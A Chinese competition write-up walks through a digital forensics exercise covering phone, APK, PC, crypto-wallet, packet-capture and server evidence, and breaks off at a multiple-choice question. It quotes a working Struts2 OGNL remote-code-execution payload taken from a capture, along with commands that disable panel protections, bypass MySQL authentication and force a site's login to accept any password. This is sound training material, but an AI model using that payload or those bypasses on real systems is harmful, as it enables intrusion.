第一届“龙信杯”电子数据取证竞赛Writeup

个人思路仅供参考~有问题可以联系我或者评论

文章目录

  • 移动终端取证
      • 1.请分析涉案手机的设备标识是_______。(标准格式:12345678)
      • 2.请确认嫌疑人首次安装目标APP的安装时间是______。(标准格式:2023-09-13.11:32:23)
      • 3.此检材共连接过______个WiFi。(标准格式:1)
      • 4.嫌疑人手机短信记录中未读的短信共有______条。(标准格式:12)
      • 5.嫌疑人检材手机在浏览器中下载海报背景图的网址是_______。(标准格式:http://www.baidu.com/admin/index.html)
      • 6.请分析涉案海报的推广ID是________。(标准格式:123456)
      • 7.嫌疑人通过短信群发去推广APP,请问收件人中有__个号码是无效的。(标准格式:12)
      • 8.通过分析,嫌疑人推送的微信账号是______。(标准格式:Lx20230916)
      • 9.请校验嫌疑人使用的“变声器”APK的包名是________。(标准格式:com.baidu.com)
      • 10.号商的联系人注册APP的ID是_________。(标准格式:12345678)
      • 11.嫌疑人于2022年11月份在_______城市。(标准格式:成都)
      • 12.嫌疑人共购买_______个QQ号。(标准格式:1)
  • APK取证
      • 1.分析手机镜像,导出涉案apk,此apk的md5值是________。(标准格式:abc123)
      • 2.分析该apk,apk的包名是________。(标准格式:com.qqj.123)
      • 3.分析该apk,app的内部版本号是__________。(标准格式:1.1)
      • 4.分析该apk,请问该apk最高支持运行的安卓版本是_______。(标准格式:11)
      • 5.分析该apk,app的主函数入口是_________。(标准格式:com.qqj.123.MainActivity)
      • 6.分析该apk,请问窃取短信的权限名称是________。(标准格式:android.permission.NETWORK)
      • 7.APP使用的OPPO的appkey值是________。(标准格式:AB-12345678)
      • 8.分析apk源码,该APK后台地址是________。(标准格式:com.qqj.123)
      • 9.分析apk源码,APP 后台地址登录的盐值是_______。(标准格式:123abc=%$&)
      • 10.分析apk源码,该APK后台地址登录密码是______。(标准格式:longxin123)
      • 11.对 APP 安装包进行分析,该 APP打包平台调证值是______。(标准格式:HER45678)
      • 12.此apk抓包获取到的可访问网站域名IP地址是_______。(标准格式:192.168.1.1)
      • 13.分析apk源码,该apk的加密方式key值是________。(标准格式:12345678)
      • 14.结合计算机镜像,综合分析,请问该apk开发者公司的座机号码是__。(标准格式:4001122334)
  • 介质取证
      • 1.对PC镜像分析,请确定涉案电脑的开机密码是_______。(标准格式:123456)
      • 2.涉案计算机最后一次正常关机时间_______。(标准格式:2023-1-11.11:11:11)
      • 3.分析涉案计算机,在2022年11月4日此电脑共开机时长为_______。(标准格式:1小时1分1秒)
      • 4.对PC镜像分析,请确认微信是否是开机自启动程序。(标准格式:是/否)
      • 5.检材硬盘中有一个加密分区,给出其中“我的秘密.jpg”文档的解密内容。(标准格式:Longxin0924)
      • 6.接上题,请问该嫌疑人10月份工资是_______元。(标准格式:123)
      • 7.对PC镜像进行分析,浏览器中使用过QQ邮箱,请问该邮箱的密码是______。(标准格式:Longxin0924)
      • 8.结合手机镜像分析,得出一个推广ID,请在此检材找到此海报,请写出路径。(标准格式:D:\X\X\1.txt)
      • 9.请找出嫌疑人的2022年收入共_______。(标准格式:123)
      • 10.分析此海报,请找到嫌疑人的银行卡号。(标准格式:62225123456321654)
  • 虚拟币分析
      • 1.分析涉案计算机,正确填写中转地址当前的代币种类______。(标准格式:BNB)
      • 2.分析涉案计算机,正确填写中转地址当前的代币余额数量_______。(标准格式:1.23)
      • 3.根据中转地址转账记录找出买币方地址。买币方地址:_____(标准格式:0x123ABC)
      • 4.根据中转地址转账记录统计买方地址转账金额。转账金额:____ ETH.(标准格式:12.3)
      • 5.在创建钱包时,应用APP都会建议我们进行助记词备份,方便以后忘记密码后找回钱包,在办案过程中时常会拿到犯罪嫌疑人备份的助记词的情况。请从以下三组助记词中判断出格式正确的一组( )
      • 6.假设上题中正确的助记词为通过侦察找到的嫌疑人钱包助记词备份(已知地址属于以太坊链),请在模拟器中通过imToken APP恢复嫌疑人钱包,并选出正确钱包地址( )
  • 流量分析
      • 1.分析“数据包1.cap”,请问客户端为什么访问不了服务器。( )
      • 2.分析“数据包1.cap”,出问题的服务器IP地址是_______。(格式:127.0.0.1)
      • 3.分析“数据包1.cap”,文件下发服务器的IP地址是_______。(标准格式:127.0.0.1)
      • 4.分析“数据包1.cap”,攻击者利用_______漏洞进行远程代码执行。(标准格式:XXX)
      • 5.分析“数据包1.cap”,请提取恶意文件,并校验该文件的MD5值为_______。(标准格式:abcd)
      • 6.分析“数据包2.cap”,其获取文件的路径是________。(标准格式:D:/X/X/1.txt)
      • 7.分析“数据包2.cap”,文件下载服务器的认证账号密码是_______。(标准格式:123)
      • 8.分析“数据包2.cap”,其下载的文件名大小有________字节。(标准格式:123)
  • 服务器取证1
      • 1.服务器系统的版本号是_______。(格式:1.1.1111)
      • 2.网站数据库的版本号是_______。(格式:1.1.1111)
      • 3.宝塔面板的“超时”时间是_______分钟。(格式:50)
      • 4.网站源码备份压缩文件SHA256值是_______。(格式:64位小写)
      • 5.分发网站sb.wiiudot.cn管理员密码默认MD5加密盐值是_______。(格式:abcd)
      • 网站重构
      • 6.分发网站sb.wiiudot.cn一共存放了_______条通讯录数据。(标准格式:1234)
      • 7.全部网站一共有_______名受害人。(格式:xxx。不去重,不进行数据恢复)
      • 8.分发网站tf.chongwuxiaoyouxi.com里面一共有_______位“组员级别”的管理员。(格式:数字)
      • 9.分发网站sb.wiiudot.cn管理员名为“0820”的邀请码是_______。(格式:xxx)
      • 10.分发网站sb.wiiudot.cn本地数据库用户sb_wiiudot_cn的密码是_______。(格式:xxx)
  • 服务器取证2
      • 1.请分析宝塔面板中默认建站目录是_______。(标准格式:/etc/www)
      • 2.在宝塔数据库目录有一个只含有一个表结构的数据库,请找到该“表结构文件”并分析出第六个字段的字段类型是_______。(标准格式:int(11))
      • 3.请分析“乐享金融”网站绑定的域名是_______。(标准格式:www.baidu.com)
      • 4.请访问“乐享金融”数据库并找到用户表,假设密码为123456,还原uid为2909,用户名为goyasha加密后密码的值是_______。(标准格式:abcdefghijklmnopqrstuvwsyz)
      • 关于网站重构
      • 5.请重建“乐享金融”,访问平台前台登陆界面,会员登陆界面顶部LOGO上的几个字是_______。(标准格式:爱金融)
      • 6.请分析“乐享金融”一共添加了_______个非外汇产品。(标准格式:5)
      • 7.请分析“乐享金融”设置充值泰达币的地址是_______。(标准格式:EDFGF97B46234FDADSDF0270CB3E)
      • 8.请分析“乐享金融”充值金额大于582402元的受害人充值总金额是_______。(标准格式:12345678)
      • 9.请分析“乐享金融”银行卡号“6239039472846284913”绑定用户的用户名是_______。(标准格式:张三)
      • 10.请分析“乐享金融”建仓时间为“2022/03/01 18:44:01”,平仓时间为“2022/03/01 18:52:01”,以太坊/泰达币的这一笔交易的平仓价格是_______。(标准格式:1888.668)
      • 11.请分析“乐享金融”订单编号为“202112090946233262”平仓时间是_______。(标准格式:2022-1-11.1:22:43)
      • 12.宝塔面板某用户曾尝试进行一次POST请求,参数为“/BTCloud?action=UploadFilesData”,请问该用户疑似使用的( )电脑系统进行访问请求的。
      • 13.请分析该服务器镜像最高权限“root”账户的密码是_______。(标准格式:a123456)

移动终端取证

1.请分析涉案手机的设备标识是_______。(标准格式:12345678)

85069625

软件一把梭,不多说了

第一届“龙信杯”电子数据取证竞赛Writeup_第1张图片

2.请确认嫌疑人首次安装目标APP的安装时间是______。(标准格式:2023-09-13.11:32:23)

2022-11-16.19:11:26

聊天记录拿到apk名字

第一届“龙信杯”电子数据取证竞赛Writeup_第2张图片

翻一翻应用列表即可

第一届“龙信杯”电子数据取证竞赛Writeup_第3张图片

3.此检材共连接过______个WiFi。(标准格式:1)

6

第一届“龙信杯”电子数据取证竞赛Writeup_第4张图片

4.嫌疑人手机短信记录中未读的短信共有______条。(标准格式:12)

17

软件解析不出来,手动翻数据库\data\com.android.providers.telephony\databases\mmssms.db

sms表中未读read字段为0

第一届“龙信杯”电子数据取证竞赛Writeup_第5张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第6张图片

5.嫌疑人检材手机在浏览器中下载海报背景图的网址是_______。(标准格式:http://www.baidu.com/admin/index.html)

http://m.ziyuanhu.com/pics/1725.html

第一届“龙信杯”电子数据取证竞赛Writeup_第7张图片

6.请分析涉案海报的推广ID是________。(标准格式:123456)

114092

第一届“龙信杯”电子数据取证竞赛Writeup_第8张图片

7.嫌疑人通过短信群发去推广APP,请问收件人中有__个号码是无效的。(标准格式:12)

1

第一届“龙信杯”电子数据取证竞赛Writeup_第9张图片

8.通过分析,嫌疑人推送的微信账号是______。(标准格式:Lx20230916)

Gq20221101

第一届“龙信杯”电子数据取证竞赛Writeup_第10张图片

9.请校验嫌疑人使用的“变声器”APK的包名是________。(标准格式:com.baidu.com)

com.chuci.voice

第一届“龙信杯”电子数据取证竞赛Writeup_第11张图片

10.号商的联系人注册APP的ID是_________。(标准格式:12345678)

36991915

第一届“龙信杯”电子数据取证竞赛Writeup_第12张图片

11.嫌疑人于2022年11月份在_______城市。(标准格式:成都)

苏州

第一届“龙信杯”电子数据取证竞赛Writeup_第13张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第14张图片

12.嫌疑人共购买_______个QQ号。(标准格式:1)

8

第一届“龙信杯”电子数据取证竞赛Writeup_第15张图片

APK取证

apk前面已经找到过了,导出来就行

1.分析手机镜像,导出涉案apk,此apk的md5值是________。(标准格式:abc123)

d56e1574c1e48375256510c58c2e92e5

2.分析该apk,apk的包名是________。(标准格式:com.qqj.123)

lx.tiantian.com

3.分析该apk,app的内部版本号是__________。(标准格式:1.1)

1.0

第一届“龙信杯”电子数据取证竞赛Writeup_第16张图片

4.分析该apk,请问该apk最高支持运行的安卓版本是_______。(标准格式:11)

12

manifest看到的sdk版本32,对应Android12

第一届“龙信杯”电子数据取证竞赛Writeup_第17张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第18张图片

5.分析该apk,app的主函数入口是_________。(标准格式:com.qqj.123.MainActivity)

lx.tiantian.com.activity.MainActivity

第一届“龙信杯”电子数据取证竞赛Writeup_第19张图片

6.分析该apk,请问窃取短信的权限名称是________。(标准格式:android.permission.NETWORK)

android.permission.READ_SMS

没啥意思的题目,翻源码根本都没看到在读短信
第一届“龙信杯”电子数据取证竞赛Writeup_第20张图片

7.APP使用的OPPO的appkey值是________。(标准格式:AB-12345678)

OP-264m10v633PC8ws8cwOOc4c0w

第一届“龙信杯”电子数据取证竞赛Writeup_第21张图片

8.分析apk源码,该APK后台地址是________。(标准格式:com.qqj.123)

app.goyasha.com

主函数里

第一届“龙信杯”电子数据取证竞赛Writeup_第22张图片

9.分析apk源码,APP 后台地址登录的盐值是_______。(标准格式:123abc=%$&)

73g=s%!lvi8h=i7a4ge*o3s@h2n^5_yk=-y#@p6)feidfjol8@

10.分析apk源码,该APK后台地址登录密码是______。(标准格式:longxin123)

lxtiantiancom

搜一下admin,login这种关键词就能找到了

第一届“龙信杯”电子数据取证竞赛Writeup_第23张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第24张图片

11.对 APP 安装包进行分析,该 APP打包平台调证值是______。(标准格式:HER45678)

H5D9D11EA

AndroidManifest里

第一届“龙信杯”电子数据取证竞赛Writeup_第25张图片

12.此apk抓包获取到的可访问网站域名IP地址是_______。(标准格式:192.168.1.1)

192.168.5.80

手翻是翻的出来的,抓包是没抓着的

第一届“龙信杯”电子数据取证竞赛Writeup_第26张图片

都没被引用过这能抓得着的??

第一届“龙信杯”电子数据取证竞赛Writeup_第27张图片

13.分析apk源码,该apk的加密方式key值是________。(标准格式:12345678)

ade4b1f8a9e6b666

搜一下AES就行了,或者手动翻翻也翻的到,跟后台写在一个包里

第一届“龙信杯”电子数据取证竞赛Writeup_第28张图片

14.结合计算机镜像,综合分析,请问该apk开发者公司的座机号码是__。(标准格式:4001122334)

4008522366

做到后面到pc的最后几题了再分析,留个坑

介质取证

1.对PC镜像分析,请确定涉案电脑的开机密码是_______。(标准格式:123456)

Longxin360004

用龙信的仿起来会有密码提示,火眼仿起来密码会直接绕过去了

提示要个工号

image-20230924134945107

微信传过一个工资条,里面有工号

第一届“龙信杯”电子数据取证竞赛Writeup_第29张图片

2.涉案计算机最后一次正常关机时间_______。(标准格式:2023-1-11.11:11:11)

2023-09-16.18:20:34

第一届“龙信杯”电子数据取证竞赛Writeup_第30张图片

3.分析涉案计算机,在2022年11月4日此电脑共开机时长为_______。(标准格式:1小时1分1秒)


不知道官方到底咋考虑的,我反正把五个时间都算上了

第一届“龙信杯”电子数据取证竞赛Writeup_第31张图片

4.对PC镜像分析,请确认微信是否是开机自启动程序。(标准格式:是/否)

第一届“龙信杯”电子数据取证竞赛Writeup_第32张图片

5.检材硬盘中有一个加密分区,给出其中“我的秘密.jpg”文档的解密内容。(标准格式:Longxin0924)

Mimi1234

bitlocker一把梭

第一届“龙信杯”电子数据取证竞赛Writeup_第33张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第34张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第35张图片

6.接上题,请问该嫌疑人10月份工资是_______元。(标准格式:123)

19821

这里前面那个直接找到的工资条出来的工资填进去是错的

用上一题的密码解工资条同目录下的那个加密压缩包,解出来的工资条才是正确的

第一届“龙信杯”电子数据取证竞赛Writeup_第36张图片

后面会有题目能反向印证

第一届“龙信杯”电子数据取证竞赛Writeup_第37张图片

7.对PC镜像进行分析,浏览器中使用过QQ邮箱,请问该邮箱的密码是______。(标准格式:Longxin0924)

Longxin@2023

只有龙信的仿起来浏览器里才有密码,火眼这个密码也会被抹掉

第一届“龙信杯”电子数据取证竞赛Writeup_第38张图片

8.结合手机镜像分析,得出一个推广ID,请在此检材找到此海报,请写出路径。(标准格式:D:\X\X\1.txt)

C:\Program Files (x86)\Tencent\WeChat\2.png

访问记录里找到个mmm.txt

第一届“龙信杯”电子数据取证竞赛Writeup_第39张图片

推广id对的上,后面给了两个海报的路径分别是1.png和2.png

ps:同目录下的blmm.TXT是bitlocker密码

第一届“龙信杯”电子数据取证竞赛Writeup_第40张图片

都导出来可以发现哈希是不一样的

ctf做题法,2的文件尾有串银行卡,对应是第十题的答案,因此2.png才是题目要的(虽然他们文件结构是jpg来着)

第一届“龙信杯”电子数据取证竞赛Writeup_第41张图片

ps:前面访问记录看到的老秘密去全局搜可以在回收站了里恢复出来

第一届“龙信杯”电子数据取证竞赛Writeup_第42张图片

是个建行银行卡密码,但是不是第10题的答案,容易被误导

第一届“龙信杯”电子数据取证竞赛Writeup_第43张图片

9.请找出嫌疑人的2022年收入共_______。(标准格式:123)

205673

前面bitlocker解开可以发现还有个dd容器

第一届“龙信杯”电子数据取证竞赛Writeup_第44张图片

仿真起来桌面有个TrueCrypt,所以是tc容器

然后又是西提艾福做题法,用前面找到的海报当作密钥文件就能挂载了,,

第一届“龙信杯”电子数据取证竞赛Writeup_第45张图片

然后这里会发现还是找不到这道题的答案,拿火眼挂载磁盘发现原文件已经被删了

第一届“龙信杯”电子数据取证竞赛Writeup_第46张图片

$RECYCLE.BIN里还是可以找到的,导出来算一下就行了

这个工资表里同样也反向印证前面十月份的工资答案

第一届“龙信杯”电子数据取证竞赛Writeup_第47张图片

x-way挂载起来可以直接看,倒都不用去找了

第一届“龙信杯”电子数据取证竞赛Writeup_第48张图片

然后开始给前面题目填坑,首先是apk的座机号码,又很西提艾福的感觉

第一届“龙信杯”电子数据取证竞赛Writeup_第49张图片

一眼感觉AES,想到之前apk里也有aes,用apk里的key和iv解一下

第一届“龙信杯”电子数据取证竞赛Writeup_第50张图片

10.分析此海报,请找到嫌疑人的银行卡号。(标准格式:62225123456321654)

6320005020052013476

前面分析过了

image-20230924134557993

虚拟币分析

前面的容器里还有个夜神模拟器的备份

ps:套神做题法,这个pc都没删干净,传个everything上去,按大小排序,pc里可以翻出来这个npbk

第一届“龙信杯”电子数据取证竞赛Writeup_第51张图片

这个备份文件本质是个zip,改一下后缀解压就能把vmdk解出来扔取证软件里分析了

1.分析涉案计算机,正确填写中转地址当前的代币种类______。(标准格式:BNB)

ETH

第一届“龙信杯”电子数据取证竞赛Writeup_第52张图片

2.分析涉案计算机,正确填写中转地址当前的代币余额数量_______。(标准格式:1.23)

0

很诡异,仿真起来是0

第一届“龙信杯”电子数据取证竞赛Writeup_第53张图片

以太坊查了一下也是 0

第一届“龙信杯”电子数据取证竞赛Writeup_第54张图片

3.根据中转地址转账记录找出买币方地址。买币方地址:_____(标准格式:0x123ABC)

0x63AA203086938f82380A6A3521cCBf9c56d111eA

4.根据中转地址转账记录统计买方地址转账金额。转账金额:____ ETH.(标准格式:12.3)

150.5

有仨交易记录

根据案情先由卖币方转0.5个ETH到买币方钱包,模拟器中的钱包地址是卖币方的,命名为中转地址是一个挖坑的点,0.5ETH是直接转到买币方地址,其他两笔是转给中间人的

火眼直接取出来的交易金额不对

第一届“龙信杯”电子数据取证竞赛Writeup_第55张图片

这个搞不出来,抄抄了

听说是联网这个数据就会被删,刚仿真起来直接关掉wifi再打开这个app可能就会有吧

第一届“龙信杯”电子数据取证竞赛Writeup_第56张图片

5.在创建钱包时,应用APP都会建议我们进行助记词备份,方便以后忘记密码后找回钱包,在办案过程中时常会拿到犯罪嫌疑人备份的助记词的情况。请从以下三组助记词中判断出格式正确的一组( )

A.raw sausage art hub inspire dizzy funny exile local middle shed primary

B.raw sausage art hub inspire dizzy funny middle shed primary

C.raw sausage art funny exile local middle shed primary

A

emmm,直接chatgpt做题法就好了

第一届“龙信杯”电子数据取证竞赛Writeup_第57张图片

6.假设上题中正确的助记词为通过侦察找到的嫌疑人钱包助记词备份(已知地址属于以太坊链),请在模拟器中通过imToken APP恢复嫌疑人钱包,并选出正确钱包地址( )

0x63AA203086938f82380A6A3521cCBf9c56d111eA

前面交易记录里已经提到这个地址了

恢复一下也行,添加钱包,助记词

第一届“龙信杯”电子数据取证竞赛Writeup_第58张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第59张图片

流量分析

1.分析“数据包1.cap”,请问客户端为什么访问不了服务器。( )

A.DDoS攻击

B.DoS攻击

C.SQL注入

D.文档攻击

B

数据包有点大,拿科莱分析一下

显然10.5.0.19被116.211.168.203爆破了,一台攻击机,dos

第一届“龙信杯”电子数据取证竞赛Writeup_第60张图片

2.分析“数据包1.cap”,出问题的服务器IP地址是_______。(格式:127.0.0.1)

10.5.0.19

由上图得是10.5.0.19,但是错了,,不知道是哪个答案

3.分析“数据包1.cap”,文件下发服务器的IP地址是_______。(标准格式:127.0.0.1)

120.210.129.29

见下一题的分析

4.分析“数据包1.cap”,攻击者利用_______漏洞进行远程代码执行。(标准格式:XXX)

struts2

流量包1太大了,先http筛选一下然后导出分组结果,追踪流起来比较方便

第一届“龙信杯”电子数据取证竞赛Writeup_第61张图片

流600开始就开始反复构造下面的payload在测可利用的ip和端口

%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','echo Windows2017-1'}:{'/bin/bash','-c','Linux2017-1'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Host: 202.104.138.26:8080

GPT做题法
第一届“龙信杯”电子数据取证竞赛Writeup_第62张图片

流839成功利用,ip端口为202.104.142.58:8088

第一届“龙信杯”电子数据取证竞赛Writeup_第63张图片

流840,841测了一下防火墙,843wget下载了一个java.log,得到前一题的文件下发服务器ip120.210.129.29

第一届“龙信杯”电子数据取证竞赛Writeup_第64张图片

844拿到java.log的内容

第一届“龙信杯”电子数据取证竞赛Writeup_第65张图片

导出来

第一届“龙信杯”电子数据取证竞赛Writeup_第66张图片

5.分析“数据包1.cap”,请提取恶意文件,并校验该文件的MD5值为_______。(标准格式:abcd)

87540c645d003e6eebf1102e6f904197

如上图

6.分析“数据包2.cap”,其获取文件的路径是________。(标准格式:D:/X/X/1.txt)

C:/Users/Administrator/Downloads/新建文件夹/新建文件夹/mail.png

第一届“龙信杯”电子数据取证竞赛Writeup_第67张图片

白给的,解不出来中文再贴个textdecode utf-8就好了

第一届“龙信杯”电子数据取证竞赛Writeup_第68张图片

7.分析“数据包2.cap”,文件下载服务器的认证账号密码是_______。(标准格式:123)

admin:passwd

流0认证401错了,流2后面才对

第一届“龙信杯”电子数据取证竞赛Writeup_第69张图片

8.分析“数据包2.cap”,其下载的文件名大小有________字节。(标准格式:123)

211625

挺无语,比赛过程微信群里通知,也不@一下,根本没看到,题目临时改成文件大小了

第一届“龙信杯”电子数据取证竞赛Writeup_第70张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第71张图片

服务器取证1

1.服务器系统的版本号是_______。(格式:1.1.1111)

7.9.2009

第一届“龙信杯”电子数据取证竞赛Writeup_第72张图片

2.网站数据库的版本号是_______。(格式:1.1.1111)

5.6.50

第一届“龙信杯”电子数据取证竞赛Writeup_第73张图片

3.宝塔面板的“超时”时间是_______分钟。(格式:50)

120

这个宝塔开了一堆访问限制,这几个好像都开了,其中23好像就是对应访问的时候会弹个前端认证

第一届“龙信杯”电子数据取证竞赛Writeup_第74张图片

全关了就好了

cp -r /www/backup/panel/ /root/ && cp -r /www/server/panel/data/ /root && rm -f /www/server/panel/data/close.pl &&bt default && bt 23 && bt 11 && bt 12 && bt 13 && bt 24 && bt 5 && bt default

第一届“龙信杯”电子数据取证竞赛Writeup_第75张图片

4.网站源码备份压缩文件SHA256值是_______。(格式:64位小写)

0bdeeacf755126dae9efd38f6a6d70323aa95217b629fd389e0e81f9b406be39

backup目录下

第一届“龙信杯”电子数据取证竞赛Writeup_第76张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第77张图片

5.分发网站sb.wiiudot.cn管理员密码默认MD5加密盐值是_______。(格式:abcd)

7f5918fe56f4a01d8b206f6a8aee40f2

这里可以找到盐值,直接填明文是错的

第一届“龙信杯”电子数据取证竞赛Writeup_第78张图片

看这个加密方式,应该是这串字符md5后的值

第一届“龙信杯”电子数据取证竞赛Writeup_第79张图片

可以验证一下,123456加密后的值是9eb2b9ad495a75f80f9cf67ed08bbaae

第一届“龙信杯”电子数据取证竞赛Writeup_第80张图片

可以找到一个对应值

第一届“龙信杯”电子数据取证竞赛Writeup_第81张图片

网站重构

这个网站重构还挺简单的,宝塔先挂个域名上去

第一届“龙信杯”电子数据取证竞赛Writeup_第82张图片

直接访问/admin会报错

第一届“龙信杯”电子数据取证竞赛Writeup_第83张图片

改一下config.php的show_error_msg字段为True,弹一下报错信息

第一届“龙信杯”电子数据取证竞赛Writeup_第84张图片

这里应该会弹一个mysql连接一个47.几的ip好像,要改一下mysql的地址,我这里已经改过了

image-20230925113300386

第一届“龙信杯”电子数据取证竞赛Writeup_第85张图片

提示mysql密码错了,直接绕过密码登录,/etc/my.cnf加个skip-grant-table字段,service mysql restart重启一下mysql服务

第一届“龙信杯”电子数据取证竞赛Writeup_第86张图片

到后台了

image-20230925113649729

这里可以直接用之前123456得到的密码9eb2b9ad495a75f80f9cf67ed08bbaae覆盖掉admin密码字段就可以直接admin/123456登录了

这里用我赛时的做法是直接绕登录逻辑

找登录逻辑的文件直接手动翻也行,我这里去找报错字段

随便登一下,提示密码错误

第一届“龙信杯”电子数据取证竞赛Writeup_第87张图片

把整套源码导出来,然后搜一下关键词即可

第一届“龙信杯”电子数据取证竞赛Writeup_第88张图片

直接不等于改成等于就完事了,任意密码登录

第一届“龙信杯”电子数据取证竞赛Writeup_第89张图片

tf那个站还要多配个伪静态,把sb的伪静态直接贴过来就行,都是一个框架的

第一届“龙信杯”电子数据取证竞赛Writeup_第90张图片

6.分发网站sb.wiiudot.cn一共存放了_______条通讯录数据。(标准格式:1234)


67097错了emmm挺懵逼的,不知道答案是啥

第一届“龙信杯”电子数据取证竞赛Writeup_第91张图片

7.全部网站一共有_______名受害人。(格式:xxx。不去重,不进行数据恢复)

506

这里不去重是指三个网站之间的数据不去重,单个网站内还是要去重的,,

第一届“龙信杯”电子数据取证竞赛Writeup_第92张图片

tf绑的是sanye123这个库
第一届“龙信杯”电子数据取证竞赛Writeup_第93张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第94张图片

wiiudot绑的是0731这个库,三段数据加一下就好了

第一届“龙信杯”电子数据取证竞赛Writeup_第95张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第96张图片

8.分发网站tf.chongwuxiaoyouxi.com里面一共有_______位“组员级别”的管理员。(格式:数字)

26

第一届“龙信杯”电子数据取证竞赛Writeup_第97张图片

9.分发网站sb.wiiudot.cn管理员名为“0820”的邀请码是_______。(格式:xxx)

443074

网站仿起来也找不到,还是得手翻数据库,在app_adminapp_appconfig两张表里

第一届“龙信杯”电子数据取证竞赛Writeup_第98张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第99张图片

mysql改一下地址

第一届“龙信杯”电子数据取证竞赛Writeup_第100张图片

10.分发网站sb.wiiudot.cn本地数据库用户sb_wiiudot_cn的密码是_______。(格式:xxx)

KE5f3xnFHYAnG5Dt

之前重构的时候就发现database.php里的密码是错的了

备份文件里的database的密码是对的,挺无语的

第一届“龙信杯”电子数据取证竞赛Writeup_第101张图片

image-20230925135320469

第一届“龙信杯”电子数据取证竞赛Writeup_第102张图片

服务器取证2

1.请分析宝塔面板中默认建站目录是_______。(标准格式:/etc/www)

/home/wwwroot

这个bt没给内网ip登录,不过无所谓,外网端口是默认8888,内网照着抄抄就好http://服务器ip:8888/login

第一届“龙信杯”电子数据取证竞赛Writeup_第103张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第104张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第105张图片

2.在宝塔数据库目录有一个只含有一个表结构的数据库,请找到该“表结构文件”并分析出第六个字段的字段类型是_______。(标准格式:int(11))

char(128)

还有一个库也只有一张表,但是列没有6个

第一届“龙信杯”电子数据取证竞赛Writeup_第106张图片

3.请分析“乐享金融”网站绑定的域名是_______。(标准格式:www.baidu.com)

jinrong.goyasha.com

第一届“龙信杯”电子数据取证竞赛Writeup_第107张图片

4.请访问“乐享金融”数据库并找到用户表,假设密码为123456,还原uid为2909,用户名为goyasha加密后密码的值是_______。(标准格式:abcdefghijklmnopqrstuvwsyz)

d2174d958131ebd43bf900e616a752e1

找一下密码加密逻辑,就是拼接明文密码和utime之后md5,utime是在第一次添加该用户的时候的时间戳写死的

第一届“龙信杯”电子数据取证竞赛Writeup_第108张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第109张图片

数据库翻一下,userinfo表里找到utime

第一届“龙信杯”电子数据取证竞赛Writeup_第110张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第111张图片

关于网站重构

这里留个坑,运行目录是/public

第一届“龙信杯”电子数据取证竞赛Writeup_第112张图片

但是可以发现public下面index.php和route.php都没,当然直接从服务器1那边拖两个进来是无济于事的

image-20230925143728695

5.请重建“乐享金融”,访问平台前台登陆界面,会员登陆界面顶部LOGO上的几个字是_______。(标准格式:爱金融)

睿文化

重构不起来,就手动翻

第一届“龙信杯”电子数据取证竞赛Writeup_第113张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第114张图片

6.请分析“乐享金融”一共添加了_______个非外汇产品。(标准格式:5)

2

wp_productclass表里看到pcid 5是外汇

第一届“龙信杯”电子数据取证竞赛Writeup_第115张图片

wp_productinfo再要注意isdelete被删除的字段,没被删除的非外汇总共2

第一届“龙信杯”电子数据取证竞赛Writeup_第116张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第117张图片

7.请分析“乐享金融”设置充值泰达币的地址是_______。(标准格式:EDFGF97B46234FDADSDF0270CB3E)

85CF33F97B46A88C7386286D0270CB3E

wp_rcset

image-20230925150206150

8.请分析“乐享金融”充值金额大于582402元的受害人充值总金额是_______。(标准格式:12345678)

101000087

充值记录在wp_price_log表内,这道题存疑

第一届“龙信杯”电子数据取证竞赛Writeup_第118张图片

9.请分析“乐享金融”银行卡号“6239039472846284913”绑定用户的用户名是_______。(标准格式:张三)

kongxin

wp_bankcard可以看到,但不是张教瘦我也是醉了

这里有个坑,查出来对应的uid是2917

第一届“龙信杯”电子数据取证竞赛Writeup_第119张图片

wp_userinfo表里可以看到uid 2917对应的username是kongxin

第一届“龙信杯”电子数据取证竞赛Writeup_第120张图片

10.请分析“乐享金融”建仓时间为“2022/03/01 18:44:01”,平仓时间为“2022/03/01 18:52:01”,以太坊/泰达币的这一笔交易的平仓价格是_______。(标准格式:1888.668)

2896.924

交易记录在wp_order表里

第一届“龙信杯”电子数据取证竞赛Writeup_第121张图片

第一届“龙信杯”电子数据取证竞赛Writeup_第122张图片

image-20230925161708859

先把时间转成时间戳,转的时候注意一下题目给的UTC+8,表的时间戳是UTC,建仓时间和平仓时间分别为16461314411646131921

第一届“龙信杯”电子数据取证竞赛Writeup_第123张图片

11.请分析“乐享金融”订单编号为“202112090946233262”平仓时间是_______。(标准格式:2022-1-11.1:22:43)

1639014743

直接查不到

第一届“龙信杯”电子数据取证竞赛Writeup_第124张图片

宝塔看了一下有备份文件

image-20230925161545531

以防万一先别直接覆盖掉,sql文件下下来然后重新建个库导进去

image-20230925161944416

有了

第一届“龙信杯”电子数据取证竞赛Writeup_第125张图片

12.宝塔面板某用户曾尝试进行一次POST请求,参数为“/BTCloud?action=UploadFilesData”,请问该用户疑似使用的( )电脑系统进行访问请求的。

A.Windows 8.1

